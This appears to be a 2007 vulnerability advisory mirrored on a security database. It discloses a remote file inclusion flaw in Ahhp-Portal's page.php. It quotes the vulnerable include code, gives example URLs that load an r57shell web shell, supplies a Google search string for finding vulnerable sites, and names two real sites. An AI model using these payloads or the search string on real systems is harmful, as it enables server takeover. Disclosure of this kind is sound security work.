Lucene search
SecurityvulnsSECURITYVULNS:DOC:16838HistoryApr 25, 2007 - 12:00 a.m.
Ahhp(php)-Portal Remote File Inclusion
2007-04-2500:00:00
vulners.com
2315
Ahhp-Portal Remote File Inclusion
SЭTE:www.ahhope.org
Demo:http://xinan.ahtcm.edu.cn
Demo2http://www.hfspaq.gov.cn
Vul Code:
<?
if ($sc=='')
include($fp.".php");
else
include($sc."/".$fp.".php");
?>
example:
http://site/page.php?fp=r57shell?
http://site/page.php?sc=r57shell?
////////////////////////////////////////////////////
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : expw0rm.com
###############################################
Google :
"page.php?fp"
// Exploit Worm www.expw0rm.com